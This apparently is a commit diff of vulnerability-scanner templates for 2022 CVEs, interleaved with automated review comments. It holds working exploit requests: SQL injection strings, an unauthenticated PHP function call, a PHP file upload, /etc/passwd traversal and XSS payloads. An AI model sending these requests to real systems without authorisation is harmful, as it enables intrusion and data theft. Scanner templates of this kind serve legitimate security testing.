The BadgeOS WordPress plugin through 3.7.0 does not sanitise and escape a parameter before using it in a SQL statement via an AJAX action, leading to an SQL Injection exploitable by unauthenticated users.
reference:
- https://wpscan.com/vulnerability/69263610-f454-4f27-80af-be523d25659e
- https://wordpress.org/plugins/badgeos/
- https://nvd.nist.gov/vuln/detail/CVE-2022-0817
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2022-0817
cwe-id: CWE-89
metadata:
verified: "true"
tags: cve2022,wp,unauth,sqli,cve,wp-plugin,badgeos,wpscan,wordpress
variables:
num: "999999999"
requests:
- raw:
- |
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
action=get-achievements&total_only=true&user_id=11 UNION ALL SELECT NULL,CONCAT(1,md5({{num}}),1),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- "contains(body, md5(num))"
- 'contains(content_type, "application/json")'
- 'contains(body, "badgeos-arrange-buttons")'
condition: and
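Review bot: the form body on L1908 is sent with raw spaces, commas and `-- -` in an `application/x-www-form-urlencoded` payload; PHP tolerates it, but any intermediate proxy or WAF that normalises the body may mangle the `UNION ALL SELECT` and turn a true positive into a miss, so percent-encode the `user_id` value. The 14-column UNION is specific to the `get-achievements` query, which is fine, but a short comment saying so would save the next maintainer from "fixing" the column count. The md5 marker plus `badgeos-arrange-buttons` check on L1913-L1915 is a solid proof.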

@ -0,0 +1,44 @@
id: CVE-2022-0885
info:
name: Member Hero <= 1.0.9 - Unauthenticated Remote Code Execution
author: theamanrawat
severity: critical
description: |
The Member Hero WordPress plugin through 1.0.9 lacks authorization checks, and does not validate the a request parameter in an AJAX action, allowing unauthenticated users to call arbitrary PHP functions with no arguments.
reference:
- https://wpscan.com/vulnerability/8b08b72e-5584-4f25-ab73-5ab0f47412df
- https://wordpress.org/plugins/member-hero/
- https://nvd.nist.gov/vuln/detail/CVE-2022-0885
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2022-0885
cwe-id: CWE-94
metadata:
verified: "true"
tags: unauth,wpscan,wp-plugin,rce,wp,wordpress,member-hero,cve,cve2022
requests:
- method: GET
path:
- "{{BaseURL}}/wp-admin/admin-ajax.php?action=memberhero_send_form&_memberhero_hook=phpinfo"
matchers-condition: and
matchers:
- type: word
words:
- "PHP Extension"
- "PHP Version"
condition: and
- type: status
status:
- 200
extractors:
- type: regex
part: body
group: 1
regex:
- '>PHP Version <\/td><td class="v">([0-9.]+)'

@ -1,7 +1,7 @@
id: CVE-2022-0928
info:
name: Microweber <1.2.12 - Stored Cross-Site Scripting
name: Microweber < 1.2.12 - Stored Cross-Site Scripting
author: amit-jd
severity: medium
description: |
@ -16,8 +16,8 @@ info:
cve-id: CVE-2022-0928
cwe-id: CWE-79
metadata:
verified: "true"
tags: authenticated,huntr,cve,cve2022,xss,microweber,cms
verified: true
tags: cve,cve2022,authenticated,huntr,xss,microweber,cms
requests:
- raw:
@ -36,7 +36,7 @@ requests:
id=0&name=vat1&type="><img+src%3dx+onerror%3dalert(document.domain)>&rate=10
- |-
- |
POST /module HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
@ -49,9 +49,9 @@ requests:
matchers:
- type: dsl
dsl:
- contains(body_3,'<td>\"><img src=x onerror=alert(document.domain)></td>')
- 'contains(body_3,"<img src=x onerror=alert(document.domain)></td>")'
- 'contains(all_headers_3,"text/html")'
- 'status_code==200'
- 'status_code_2 == 200 && status_code_3 == 200'
condition: and
# Enhanced by mp on 2022/09/14

@ -0,0 +1,44 @@
id: CVE-2022-1007
info:
name: Advanced Booking Calendar < 1.7.1 - Cross-Site Scripting
author: 8arthur
severity: medium
description: |
The Advanced Booking Calendar WordPress plugin before 1.7.1 does not sanitise and escape the room parameter before outputting it back in an admin page, leading to a Reflected Cross-Site Scripting issue
reference:
- https://wpscan.com/vulnerability/6f5b764b-d13b-4371-9cc5-91204d9d6358
- https://wordpress.org/plugins/advanced-booking-calendar/
- https://nvd.nist.gov/vuln/detail/cve-2022-1007
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2022-1007
cwe-id: CWE-79
metadata:
verified: "true"
tags: wp-plugin,advanced-booking-calendar,cve,cve2022,wp,authenticated,wpscan,wordpress,xss
requests:
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
log={{username}}&pwd={{password}}&wp-submit=Log+In
- |
GET /wp-admin/admin.php?page=advanced-booking-calendar-show-seasons-calendars&setting=changeSaved&room=1111%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%3C%22 HTTP/1.1
Host: {{Hostname}}
cookie-reuse: true
req-condition: true
matchers:
- type: dsl
dsl:
- "contains(body_2, '<script>alert(document.domain)</script>')"
- "contains(body_2, 'advanced-booking-calendar')"
- "contains(all_headers_2, 'text/html')"
- "status_code_2 == 200"
condition: and

@ -0,0 +1,35 @@
id: CVE-2022-1057
info:
name: Pricing Deals for WooCommerce < 2.0.3 - Unauthenticated SQL Injection
author: theamanrawat
severity: critical
description: |
The Pricing Deals for WooCommerce WordPress plugin through 2.0.2.02 does not properly sanitise and escape a parameter before using it in a SQL statement via an AJAX action available to unauthenticated users, leading to an unauthenticated SQL injection.
reference:
- https://wpscan.com/vulnerability/7c33ffc3-84d1-4a0f-a837-794cdc3ad243
- https://wordpress.org/plugins/pricing-deals-for-woocommerce/
- https://nvd.nist.gov/vuln/detail/CVE-2022-1057
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2022-1057
cwe-id: CWE-89
metadata:
verified: "true"
tags: cve,cve2022,sqli,wpscan,wordpress,wp-plugin,wp,pricing-deals-for-woocommerce,unauth
requests:
- raw:
- |
@timeout: 15s
GET /wp-admin/admin-ajax.php?action=vtprd_product_search_ajax&term=aaa%27+union+select+1,sleep(6),3--+- HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'duration>=6'
- 'status_code == 500'
- 'contains(body, "been a critical error")'
condition: and
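Review bot: the time-based check on L2074 (`duration>=6`) is measured on a single request, so a slow host or a congested link produces a false positive, and it is ANDed with `status_code == 500` and "been a critical error" (L2075-L2076), which ties detection to the plugin crashing after the `sleep(6)` rather than to the delay itself. Send a baseline request without `sleep` first and compare the two durations, and either drop the 500/critical-error conditions or document that they are the known behaviour of 2.0.2.02 so a later plugin build that handles the error gracefully is not missed.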

@ -0,0 +1,54 @@
id: CVE-2022-1574
info:
name: WordPress HTML2WP <=1.0.0 - Arbitrary File Upload
author: theamanrawat
severity: critical
description: |
WordPress HTML2WP plugin through 1.0.0 contains an arbitrary file upload vulnerability. The plugin does not perform authorization and CSRF checks when importing files and does not validate them. As a result, an attacker can upload arbitrary files on the remote server.
reference:
- https://wpscan.com/vulnerability/c36d0ea8-bf5c-4af9-bd3d-911eb02adc14
- https://wordpress.org/plugins/html2wp/
- https://nvd.nist.gov/vuln/detail/CVE-2022-1574
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2022-1574
cwe-id: CWE-434
metadata:
verified: "true"
tags: wp-plugin,wp,fileupload,unauth,wpscan,cve2022,wordpress,intrusive,cve,html2wp
requests:
- raw:
- |
POST /wp-admin/admin.php?page=html2wp-settings HTTP/1.1
Host: {{Hostname}}
Content-Length: 253
Content-Type: multipart/form-data; boundary=---------------------------7816508136577551742878603990
Connection: close
-----------------------------7816508136577551742878603990
Content-Disposition: form-data; name="local_importing[]"; filename="{{randstr}}.php"
Content-Type: text/html
<?php
echo "File Upload success";
-----------------------------7816508136577551742878603990--
- |
GET /wp-content/uploads/html2wp/{{randstr}}.php HTTP/1.1
Host: {{Hostname}}
req-condition: true
matchers:
- type: dsl
dsl:
- "status_code_1 == 302"
- "status_code_2 == 200"
- "contains(body_2, 'File Upload success')"
condition: and
# Enhanced by md on 2022/10/20
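Review bot: `Content-Length: 253` on L2106 is hard-coded although the multipart body length depends on the `{{randstr}}` filename on L2110; in normal (non-unsafe) mode the client recomputes the header from the parsed body, so the value is dead, and in unsafe mode it would be wrong, so remove it. The template also leaves an executable `{{randstr}}.php` under `/wp-content/uploads/html2wp/` (L2116) with no cleanup request; the `intrusive` tag on L2100 is correct, but the description on L2088 should say a PHP file is written to the target and left there.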

@ -1,16 +1,16 @@
id: CVE-2022-1768
info:
name: RSVPMaker WordPress plugin <= 9.3.2 - SQL Injection
name: WordPress RSVPMaker <=9.3.2 - SQL Injection
author: edoardottt
severity: high
description: |
The RSVPMaker plugin for WordPress is vulnerable to unauthenticated SQL Injection due to insufficient escaping and parameterization on user supplied data passed to multiple SQL queries in the ~/rsvpmaker-email.php file. This makes it possible for unauthenticated attackers to steal sensitive information from the database in versions up to, and including, 9.3.2.
WordPress RSVPMaker plugin through 9.3.2 contains a SQL injection vulnerability due to insufficient escaping and parameterization on user-supplied data passed to multiple SQL queries in ~/rsvpmaker-email.php. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
reference:
- https://gist.github.com/Xib3rR4dAr/441d6bb4a5b8ad4b25074a49210a02cc
- https://wordpress.org/plugins/rsvpmaker/
- https://nvd.nist.gov/vuln/detail/CVE-2022-1768
- https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=2725322%40rsvpmaker&new=2725322%40rsvpmaker&sfp_email=&sfph_mail=
- https://nvd.nist.gov/vuln/detail/CVE-2022-1768
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
@ -49,3 +49,5 @@ requests:
- type: status
status:
- 200
# Enhanced by md on 2022/10/12
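Review bot: the plugins.trac.wordpress.org link on L2144 compares a changeset with itself (`old=2725322%40rsvpmaker&new=2725322%40rsvpmaker`) and therefore renders an empty diff; point it at the fixing changeset versus its predecessor or replace it with the plugin changelog entry for the 9.3.3 fix.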

@ -1,11 +1,11 @@
id: CVE-2022-1910
info:
name: Shortcodes and extra features for Phlox theme < 2.9.8 - Cross-Site-Scripting
name: WordPress Shortcodes and Extra Features for Phlox <2.9.8 - Cross-Site Scripting
author: Akincibor
severity: medium
description: |
The plugin does not sanitise and escape a parameter before outputting it back in the response, leading to a Reflected Cross-Site Scripting.
WordPress Shortcodes and extra features plugin for the Phlox theme before 2.9.8 contains a cross-site scripting vulnerability. The plugin does not sanitize and escape a parameter before outputting it back in the response. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
reference:
- https://wpscan.com/vulnerability/8afe1638-66fa-44c7-9d02-c81573193b47
- https://wordpress.org/plugins/auxin-elements/
@ -41,3 +41,5 @@ requests:
- type: status
status:
- 200
# Enhanced by md on 2022/10/17

@ -0,0 +1,45 @@
id: CVE-2022-22242
info:
name: Juniper Web Device Manager - Cross-Site Scripting
author: EvergreenCartoons
severity: medium
description: |
A Cross-site Scripting (XSS) vulnerability in the J-Web component of Juniper Networks Junos OS allows an unauthenticated attacker to run malicious scripts reflected off of J-Web to the victim's browser in the context of their session within J-Web
reference:
- https://octagon.net/blog/2022/10/28/juniper-sslvpn-junos-rce-and-multiple-vulnerabilities/
- https://nvd.nist.gov/vuln/detail/CVE-2022-22242
- https://supportportal.juniper.net/s/article/2022-10-Security-Bulletin-Junos-OS-Multiple-vulnerabilities-in-J-Web?language=en_US
- https://kb.juniper.net/JSA69899
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2022-22242
cwe-id: CWE-79
metadata:
shodan-query: title:"Juniper Web Device Manager"
verified: "true"
tags: cve,cve2022,xss,juniper,junos
requests:
- method: GET
path:
- '{{BaseURL}}/error.php?SERVER_NAME=<script>alert(document.domain)</script>'
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<script>alert(document.domain)</script>"
- "The requested resource is not authorized to view"
condition: and
- type: word
part: header
words:
- "text/html"
- type: status
status:
- 200
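Review bot: `shodan-query: title:"Juniper Web Device Manager"` on L2197 is not a valid Shodan filter; the filter is `http.title:`, as used on L1515 elsewhere in this commit, so the query as written degrades to a free-text search. Also the `<script>` payload on L2203 is placed unencoded in the request path; URL-encode it (`%3Cscript%3E...`) so servers or proxies that reject raw angle brackets in the request line do not hide a vulnerable J-Web.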

@ -1,11 +1,11 @@
id: CVE-2022-2467
info:
name: SourceCodester Garage Management System 1.0 - SQL Injection
name: Garage Management System 1.0 - SQL Injection
author: edoardottt
severity: critical
description: |
A vulnerability has been found in SourceCodester Garage Management System 1.0 and classified as critical. This vulnerability affects unknown code of the file /login.php. The manipulation of the argument username with the input 1@a.com' AND (SELECT 6427 FROM (SELECT(SLEEP(5)))LwLu) AND 'hsvT'='hsvT leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used.
Garage Management System 1.0 contains a SQL injection vulnerability in /login.php via manipulation of the argument username with input 1@a.com' AND (SELECT 6427 FROM (SELECT(SLEEP(5)))LwLu) AND 'hsvT'='hsvT. An attacker can possibly obtain sensitive information from a database, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
reference:
- https://github.com/xiahao90/CVEproject/blob/main/xiahao.webray.com.cn/Garage-Management-System.md
- https://www.sourcecodester.com/php/15485/garage-management-system-using-phpmysql-source-code.html
@ -43,3 +43,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/10/12
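Review bot: the rewritten description on L2231 still reproduces the sqlmap-generated payload verbatim (`1@a.com' AND (SELECT 6427 FROM (SELECT(SLEEP(5)))LwLu) AND 'hsvT'='hsvT`), random aliases included, without saying what it is; replace it with "a time-based blind SQL injection in the `username` parameter of /login.php" and keep the payload, if at all, as a single example, so the summary reads as an advisory rather than a tool dump.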

@ -0,0 +1,54 @@
id: CVE-2022-28290
info:
name: Country Selector < 1.6.6 - Cross-Site Scripting
author: Akincibor
severity: medium
description: |
The plugin does not sanitise and escape the country and lang parameters before outputting them back in the response, leading to a Reflected Cross-Site Scripting.
reference:
- https://wpscan.com/vulnerability/6c5a4bce-6266-4cfc-bc87-4fc3e36cb479
- https://nvd.nist.gov/vuln/detail/CVE-2022-28290
- https://cybersecurityworks.com/zerodays/cve-2022-28290-reflected-cross-site-scripting-in-welaunch.html
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2022-28290
cwe-id: CWE-79
tags: wordpress-country-selector,wpscan,cve,cve2022,wp,wordpress,wp-plugin,xss
requests:
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
- |
POST /wp-admin/admin-ajax.php?action=check_country_selector HTTP/2
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
country=%3Cimg%20src%3Dx%20onerror%3Dalert%28document.domain%29%3E&lang=%3Cimg%20src%3Dx%20onerror%3Dalert%28document.domain%29%3E&site_locate=en-US
skip-variables-check: true
cookie-reuse: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- '<img src=x onerror=alert(document.domain)>'
- 'country_selector_'
condition: and
- type: word
part: header
words:
- text/html
- type: status
status:
- 200
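Review bot: the second raw request on L2269 uses `HTTP/2` in the request line while the login request on L2264 uses `HTTP/1.1`; unless h2 is required to reach the reflection, which nothing here suggests, use HTTP/1.1 for both so a vulnerable site behind an HTTP/1.1-only front end is not skipped. `skip-variables-check: true` on L2273 also looks unnecessary, since every `{{...}}` in the template is a known variable; if it was added to silence a validator error, say which one in a comment.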

@ -0,0 +1,58 @@
id: CVE-2022-2863
info:
name: WordPress WPvivid Backup < 0.9.76 - Local File Inclusion
author: tehtbl
severity: medium
description: The plugin does not sanitise and validate a parameter before using it to read the content of a file, allowing high privilege users to read any file from the web server via a Traversal attack.
reference:
- https://seclists.org/fulldisclosure/2022/Oct/0
- https://wpscan.com/vulnerability/cb6a3304-2166-47a0-a011-4dcacaa133e5
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2863
- http://packetstormsecurity.com/files/168616/WordPress-WPvivid-Backup-Path-Traversal.html
remediation: Upgrade to version 0.9.76 or later.
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N
cvss-score: 4.9
cve-id: CVE-2022-2863
cwe-id: CWE-22
tags: wp,wpscan,seclists,packetstorm,authenticated,cve,cve2022,lfi,wordpress,wp-plugin
requests:
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
- |
GET /wp-admin/admin.php?page=WPvivid HTTP/1.1
Host: {{Hostname}}
- |
GET /wp-admin/admin-ajax.php?_wpnonce={{nonce}}&action=wpvivid_download_export_backup&file_name=../../../../../../../etc/passwd&file_size=922 HTTP/1.1
Host: {{Hostname}}
Referer: {{BaseURL}}/wp-admin/admin.php?page=WPvivid
cookie-reuse: true
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- "root:.*:0:0:"
- type: status
status:
- 200
extractors:
- type: regex
name: nonce
part: body
group: 1
regex:
- '"_ajax_nonce":"([0-9a-z]+)"'
internal: true
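Review bot: the second request (`GET /wp-admin/admin.php?page=WPvivid`) exists only so the `nonce` extractor can harvest `_ajax_nonce` for the third request, and the template silently depends on `{{username}}`/`{{password}}` being supplied as variables; a one-line comment saying both would save readers from reverse-engineering the flow. The hard-coded `file_size=922` also deserves a comment, since the value is taken from the PoC rather than derived from the target.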

@ -1,16 +1,16 @@
id: CVE-2022-29272
info:
name: Nagios XI < 5.8.5 - Open Redirect
name: Nagios XI <5.8.5 - Open Redirect
author: ritikchaddha
severity: medium
description: |
In Nagios XI through 5.8.5, an open redirect vulnerability exists in the login function that could lead to spoofing.
Nagios XI through 5.8.5 contains an open redirect vulnerability in the login function. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.
reference:
- https://github.com/sT0wn-nl/CVEs/tree/master/CVE-2022-29272
- https://nvd.nist.gov/vuln/detail/CVE-2022-29272
- https://github.com/4LPH4-NL/CVEs
- https://github.com/sT0wn-nl/CVEs/blob/master/README.md#nagios-xi
- https://nvd.nist.gov/vuln/detail/CVE-2022-29272
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
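Review bot: the new name `Nagios XI <5.8.5 - Open Redirect` and the new description `Nagios XI through 5.8.5 contains ...` disagree on whether 5.8.5 itself is affected ("through" includes it, "<" excludes it); align the two, for example `Nagios XI <=5.8.5` if 5.8.5 is affected as the description says.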
@ -48,3 +48,5 @@ requests:
regex:
- '<input type="hidden" name="nsp" value="(.*)">'
- "<input type='hidden' name='nsp' value='(.*)'>"
# Enhanced by md on 2022/10/14

@ -1,16 +1,16 @@
id: CVE-2022-29775
info:
name: iSpyConnect iSpy v7.2.2.0 - Improper Authentication
name: iSpy 7.2.2.0 - Authentication Bypass
author: arafatansari
severity: critical
description: |
iSpyConnect iSpy v7.2.2.0 allows attackers to bypass authentication via a crafted URL.
iSpy 7.2.2.0 contains an authentication bypass vulnerability. An attacker can craft a URL and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.
reference:
- https://gist.github.com/securylight/79f673aa3a453c80c0e78f356a8f650b
- https://github.com/securylight/CVES_write_ups/blob/main/iSpy_connect.pdf
- https://nvd.nist.gov/vuln/detail/CVE-2022-29775
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=2022-29775
- https://nvd.nist.gov/vuln/detail/CVE-2022-29775
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
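Review bot: the added MITRE reference `https://cve.mitre.org/cgi-bin/cvename.cgi?name=2022-29775` omits the `CVE-` prefix that the same link carries in the other templates of this commit (e.g. `name=CVE-2022-30513`); use the full id `name=CVE-2022-29775` for consistency.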
@ -44,3 +44,5 @@ requests:
- type: status
status:
- 200
# Enhanced by md on 2022/10/19

@ -5,12 +5,11 @@ info:
author: tess
severity: critical
description: |
School Dormitory Management System 1.0 is vulnerable to SQL Injection via accounts/payment_history.php:31.
School Dormitory Management System 1.0 contains a SQL injection vulnerability via accounts/payment_history.php:31. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
reference:
- https://github.com/bigzooooz/CVE-2022-30512
- https://nvd.nist.gov/vuln/detail/CVE-2022-30512
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=2022-3051
- https://www.sourcecodester.com/php/15319/school-dormitory-management-system-phpoop-free-source-code.html
- https://nvd.nist.gov/vuln/detail/CVE-2022-30512
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
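Review bot: the added MITRE reference `name=2022-3051` is missing the last digit of the CVE id (the GitHub and NVD references in the same block point at CVE-2022-30512), so the link resolves to the wrong or a nonexistent entry; it should read `name=CVE-2022-30512`.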
@ -43,3 +42,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/10/12

@ -1,17 +1,15 @@
id: CVE-2022-30513
info:
name: School Dormitory Management - Authenticated XSS
name: School Dormitory Management System 1.0 - Authenticated Cross-Site Scripting
author: tess
severity: medium
description: |
School Dormitory Management System v1.0 is vulnerable to reflected
cross-site scripting (XSS) via admin/inc/navigation.php:125
School Dormitory Management System 1.0 contains an authenticated cross-site scripting vulnerability via admin/inc/navigation.php:125. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
reference:
- https://github.com/bigzooooz/CVE-2022-30513
- https://www.sourcecodester.com/php/15319/school-dormitory-management-system-phpoop-free-source-code.html
- https://nvd.nist.gov/vuln/detail/CVE-2022-30513
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30513
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
@ -49,3 +47,5 @@ requests:
- type: status
status:
- 200
# Enhanced by md on 2022/10/17

@ -1,16 +1,16 @@
id: CVE-2022-30514
info:
name: School Dormitory Management - Authenticated XSS via "s=" parameter
name: School Dormitory Management System 1.0 - Authenticated Cross-Site Scripting
author: tess
severity: medium
description: |
School Dormitory Management System v1.0 is vulnerable to reflected cross-site scripting (XSS) via admin/inc/navigation.php:125
School Dormitory Management System 1.0 contains an authenticated cross-site scripting vulnerability in admin/inc/navigation.php:126. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
reference:
- https://github.com/bigzooooz/CVE-2022-30514
- https://www.sourcecodester.com/php/15319/school-dormitory-management-system-phpoop-free-source-code.html
- https://nvd.nist.gov/vuln/detail/CVE-2022-30514
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30514
- https://nvd.nist.gov/vuln/detail/CVE-2022-30514
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
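Review bot: the new name `School Dormitory Management System 1.0 - Authenticated Cross-Site Scripting` is identical to the name given to CVE-2022-30513 in this same commit, so the `via "s=" parameter` detail that distinguished the two templates in scan output is lost; keep the parameter in the name. The description also moves the source location from `navigation.php:125` to `:126` while the CVE-2022-30513 description keeps `:125`; confirm against the reference that this is intentional.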
@ -48,3 +48,5 @@ requests:
- type: status
status:
- 200
# Enhanced by md on 2022/10/17

@ -16,7 +16,7 @@ info:
cvss-score: 9.8
cve-id: CVE-2022-31814
metadata:
verified: true
verified: "true"
tags: cve,cve2022,pfsense,pfblockerng,rce,oast
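Review bot: `verified: true` becomes the string `"true"` here, but elsewhere in this commit the field stays an unquoted boolean (the new CVE-2022-40879 and CVE-2022-41840 templates); pick one form for the metadata field across the repository, otherwise anything that reads the value typed gets a mix of booleans and strings.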
requests:

@ -0,0 +1,41 @@
id: CVE-2022-33901
info:
name: MultiSafepay plugin for WooCommerce <= 4.13.1 - Unauthenticated Arbitrary File Read
author: theamanrawat
severity: high
description: |
Unauthenticated Arbitrary File Read vulnerability in MultiSafepay plugin for WooCommerce plugin <= 4.13.1 at WordPress.
reference:
- https://wordpress.org/plugins/multisafepay/
- https://nvd.nist.gov/vuln/detail/CVE-2022-33901
- https://wordpress.org/plugins/multisafepay/#developers
- https://patchstack.com/database/vulnerability/multisafepay/wordpress-multisafepay-plugin-for-woocommerce-plugin-4-13-1-unauthenticated-arbitrary-file-read-vulnerability
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2022-33901
metadata:
verified: "true"
tags: cve,cve2022,wp-plugin,wp,wordpress,unauth,multisafepay,woocommerce
requests:
- method: GET
path:
- "{{BaseURL}}/wp-admin/admin-ajax.php?action=admin_init&log_filename=../../../../../../../../../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- "root:.*:0:0:"
- type: word
part: header
words:
- "application/octet-stream"
- type: status
status:
- 200
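Review bot: the `classification` block lacks a `cwe-id` (the sibling traversal template CVE-2022-2863 in this commit uses CWE-22 for the same bug class), and the description repeats the word `plugin` (`MultiSafepay plugin for WooCommerce plugin <= 4.13.1 at WordPress`); suggest `MultiSafepay plugin for WooCommerce <= 4.13.1 contains an unauthenticated arbitrary file read vulnerability via the log_filename parameter.`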

@ -1,16 +1,16 @@
id: CVE-2022-35914
info:
name: GLPI - Remote Code Execution
name: GLPI <=10.0.2 - Remote Command Execution
author: For3stCo1d
severity: critical
description: |
/vendor/htmlawed/htmlawed/htmLawedTest.php in the htmlawed module for GLPI through 10.0.2 allows PHP code injection.
GLPI through 10.0.2 is susceptible to remote command execution injection in /vendor/htmlawed/htmlawed/htmLawedTest.php in the htmlawed module.
reference:
- https://mayfly277.github.io/posts/GLPI-htmlawed-CVE-2022-35914
- https://github.com/cosad3s/CVE-2022-35914-poc
- https://nvd.nist.gov/vuln/detail/CVE-2022-35914
- http://www.bioinformatics.org/phplabware/sourceer/sourceer.php?&Sfs=htmLawedTest.php&Sl=.%2Finternal_utilities%2FhtmLawed
- https://nvd.nist.gov/vuln/detail/CVE-2022-35914
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
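Review bot: `is susceptible to remote command execution injection` is not a recognised term; the removed line and the references describe PHP code injection in htmLawedTest.php, so suggest `allows remote code execution through PHP code injection in /vendor/htmlawed/htmlawed/htmLawedTest.php in the htmlawed module` and keep the name as `Remote Code Execution` rather than `Remote Command Execution`.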
@ -44,3 +44,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/10/12

@ -1,16 +1,16 @@
id: CVE-2022-38553
info:
name: Academy Learning Management System < v5.9.1 - Reflected XSS
name: Academy Learning Management System <5.9.1 - Cross-Site Scripting
author: edoardottt
severity: medium
description: |
Academy Learning Management System before v5.9.1 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the Search parameter.
Academy Learning Management System before 5.9.1 contains a cross-site scripting vulnerability via the Search parameter. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
reference:
- https://www.youtube.com/watch?v=yFiZffHoeKs&ab_channel=4websecurity
- https://github.com/4websecurity/CVE-2022-38553
- https://nvd.nist.gov/vuln/detail/CVE-2022-38553
- https://codecanyon.net/item/academy-course-based-learning-management-system/22703468
- https://nvd.nist.gov/vuln/detail/CVE-2022-38553
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
@ -43,3 +43,5 @@ requests:
- type: status
status:
- 200
# Enhanced by md on 2022/10/18

@ -0,0 +1,44 @@
id: CVE-2022-38870
info:
name: Free5gc - Information disclosure
author: For3stCo1d
severity: high
description: |
Free5gc v3.2.1 is vulnerable to Information disclosure.
reference:
- https://github.com/free5gc/free5gc/issues/387
- https://nvd.nist.gov/vuln/detail/CVE-2022-38870
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2022-38870
cwe-id: CWE-306
metadata:
shodan-query: http.title:"free5GC Web Console"
tags: cve,cve2022,free5gc,exposure
requests:
- raw:
- |
GET /api/subscriber HTTP/1.1
Host: {{Hostname}}
Token: admin
matchers-condition: and
matchers:
- type: word
part: body
words:
- '"plmnID":'
- '"ueId":'
condition: and
- type: word
part: header
words:
- "application/json"
- type: status
status:
- 200
